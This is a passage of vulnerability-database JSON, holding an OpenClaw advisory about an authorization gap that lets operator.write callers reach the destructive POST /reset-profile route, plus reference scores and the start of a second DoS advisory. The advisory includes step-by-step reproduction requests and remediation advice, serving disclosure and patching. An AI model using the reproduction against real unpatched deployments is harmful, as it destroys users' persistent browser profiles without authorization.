            "summary": "OpenClaw: `browser.request` still allows `POST /reset-profile` through the `operator.write` surface\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n# Title\n\n`browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q`\n\n## Severity Assessment\n\nHigh\n\nCWE:\n\n- `CWE-863: Incorrect Authorization`\n\nProposed CVSS v3.1:\n\n- `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`)\n\nAn authenticated caller who only has access to the scoped Gateway method `browser.request` on the `operator.write` surface can still reach a destructive persistent-profile management route.\n\nLikely related advisory family:\n\n- `GHSA-vmhq-cqm9-6p7q`\n\nThis should be treated as a later-version residual or incomplete fix. The earlier fix blocked `POST /profiles/create` and profile deletion, but the latest released `v2026.3.22` code still omits `POST /reset-profile` from the same mutation gate.\n\n## Impact\n\nA caller with `operator.write` access to `browser.request` can still trigger persistent profile reset via `POST /reset-profile`.\n\nThis crosses the intended privilege boundary for browser profile management because the release already attempts to block adjacent persistent profile mutations on this same surface.\n\nIn practice, the allowed route reaches destructive behavior that can:\n\n- stop the running browser for that profile\n- close the Playwright browser connection for that profile\n- move the profile's local `userDataDir` to Trash when it exists\n\nThis is a real integrity and availability impact on persistent browser state, not a route-classification mismatch with no side effects.\n\n## Affected Component\n\nProduct:\n\n- `openclaw`\n\nTested latest released version:\n\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n\nPublished artifact for that release:\n\n- package: 
`openclaw-2026.3.22.tgz`\n- package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n- package build-info timestamp: `2026-03-23T10:56:05.946Z`\n\nExact vulnerable paths on the shipped tag:\n\n- `src/gateway/method-scopes.ts:114`\n  - `browser.request` is placed on the `operator.write` surface\n- `src/gateway/server-methods/browser.ts:155-165`\n  - requests are only denied when `isPersistentBrowserProfileMutation(method, path)` returns true\n- `src/browser/request-policy.ts:19-25`\n  - the mutation classifier recognizes `POST /profiles/create` and `DELETE /profiles/:name`, but not `POST /reset-profile`\n- `src/browser/routes/basic.ts:161-170`\n  - the browser server exposes `POST /reset-profile`\n- `src/browser/server-context.reset.ts:37-63`\n  - `resetProfile()` stops the browser, closes the connection, and moves the local profile directory to Trash when present\n- `src/node-host/invoke-browser.ts:240-243`\n  - the same route-classification helper is reused in the browser proxy path when profile restrictions are active\n\nRelevant regression coverage gap on the shipped tag:\n\n- `src/gateway/server-methods/browser.profile-from-body.test.ts:104-140`\n  - tests only block `POST /profiles/create` and `DELETE /profiles/:name`\n  - there is no equivalent deny case for `POST /reset-profile`\n\nPublished artifact evidence for the exact released package:\n\n- `openclaw-2026.3.22.tgz::package/dist/build-info.json`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11469-11525`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11484-11485`\n- `openclaw-2026.3.22.tgz::package/dist/request-policy-nIRryZwZ.js:9-12`\n- `openclaw-2026.3.22.tgz::package/dist/routes-CdaHRCET.js:6874-6889`\n\nImportant release note:\n\n- the published package build-info commit differs from the release tag target commit\n- for this issue, the relevant authorization and route behavior was cross-checked in both the shipped tag source and the published package 
bundle, and it matches semantically on the vulnerable path\n\n## Technical Reproduction\n\nA direct control/exploit pair can be reproduced against the latest released version.\n\nPreconditions:\n\n- use `openclaw@2026.3.22`\n- authenticate as a caller that has access to the scoped Gateway method `browser.request`\n- keep that caller on `operator.write`, not `operator.admin`\n- ensure the target local browser profile exists\n\nReproduction steps:\n\n1. Call `browser.request` with:\n   - `method: \"POST\"`\n   - `path: \"/profiles/create\"`\n   - `body: { \"name\": \"poc-profile\" }`\n2. Observe the control case is rejected with:\n   - `browser.request cannot create or delete persistent browser profiles`\n3. Call `browser.request` again with:\n   - `method: \"POST\"`\n   - `path: \"/reset-profile\"`\n   - `body: { \"profile\": \"poc-profile\", \"name\": \"poc-profile\" }`\n4. Observe that the exploit case is not rejected by the same handler.\n5. Observe that the request is forwarded to the browser route/dispatcher, rather than being denied by the mutation classifier.\n6. 
Observe that the reset route succeeds and applies profile reset behavior.\n\nWhy this happens in the released code:\n\n- the release tries to gate persistent profile mutation using `isPersistentBrowserProfileMutation(...)`\n- that helper does not classify `POST /reset-profile` as a protected mutation\n- the exposed browser server route still maps `/reset-profile` to `profileCtx.resetProfile()`\n- `resetProfile()` performs state-changing behavior on the selected local profile\n\n## Demonstrated Impact\n\nThe shipped release shows the following behavior difference:\n\nControl case:\n\n- `POST /profiles/create`\n- rejected before the request is dispatched to the browser control path\n\nExploit case:\n\n- `POST /reset-profile`\n- not classified as a blocked mutation\n- remains reachable through the `browser.request` surface\n- reaches `resetProfile()`, which performs destructive profile-management operations\n\nThe reached route has concrete side effects:\n\n- stops the running browser if active\n- closes the Playwright browser connection\n- moves the profile's local `userDataDir` to Trash if it exists\n\nThis is therefore a concrete authorization and policy gap on a real destructive profile-management route. 
It is not a complaint about the existence of `browser.request` by itself.\n\n## Environment\n\nEnvironment used for validation:\n\n- product: `openclaw`\n- latest released version: `2026.3.22`\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n- published package: `openclaw-2026.3.22.tgz`\n- published package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n\nExplicit trust-model statement:\n\n- this report does **not** rely on adversarial or mutually untrusted operators sharing one gateway host or config\n\nScope check:\n\n- this is **not** a complaint about the existence of the explicit `browser.request` surface by itself\n- this is **not** a prompt-injection-only report\n- this is **not** a multi-tenant shared-gateway claim\n- this is **not** an attack on the unscoped HTTP compatibility endpoints\n- this is a concrete missed route inside an intended privilege gate on a real scoped Gateway method\n- the control case proves the policy is intended to exist on this surface, and the exploit case proves `POST /reset-profile` remains outside that gate in the shipped release\n\n## Remediation Advice\n\nRecommended fix:\n\n1. Extend the persistent-profile mutation classifier to include `POST /reset-profile`.\n2. Reuse the same centralized route classification everywhere the release currently relies on `isPersistentBrowserProfileMutation(...)`, including:\n   - `src/gateway/server-methods/browser.ts`\n   - `src/node-host/invoke-browser.ts`\n3. Add regression coverage with both:\n   - a deny control for `POST /reset-profile` on the lower-privilege `browser.request` surface\n   - an allow control for non-mutating browser profile reads\n4. Review nearby profile-management routes for any other state-changing endpoints that are still omitted from the mutation classifier.\n5. Treat `GHSA-vmhq-cqm9-6p7q` as the prior family and close the remaining residual route in the same policy surface.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35653",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17412",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1737",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17407",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35653"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0",
                    "reference_id": "4dcc39c25c6cc63fedfd004f52d173716576fcf0",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35653",
                    "reference_id": "CVE-2026-35653",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35653"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a",
                    "reference_id": "e7d11f6c33e223a0dd8a21cfe01076bd76cef87a",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xp9r-prpg-373r",
                    "reference_id": "GHSA-xp9r-prpg-373r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xp9r-prpg-373r"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request",
                    "reference_id": "openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35653",
                "GHSA-xp9r-prpg-373r"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-384t-z1h8-pfft"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89653?format=api",
            "vulnerability_id": "VCID-38g8-39ek-xbat",
            "summary": "OpenClaw: Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n## Summary\nImage pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 image processing could fail open on oversized pixel counts and allow decompression-bomb DoS, an availability issue that is valid at medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `0ed4f8a72bb140045962e97ab01c94c076b758a4` — 2026-03-31T22:52:55+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
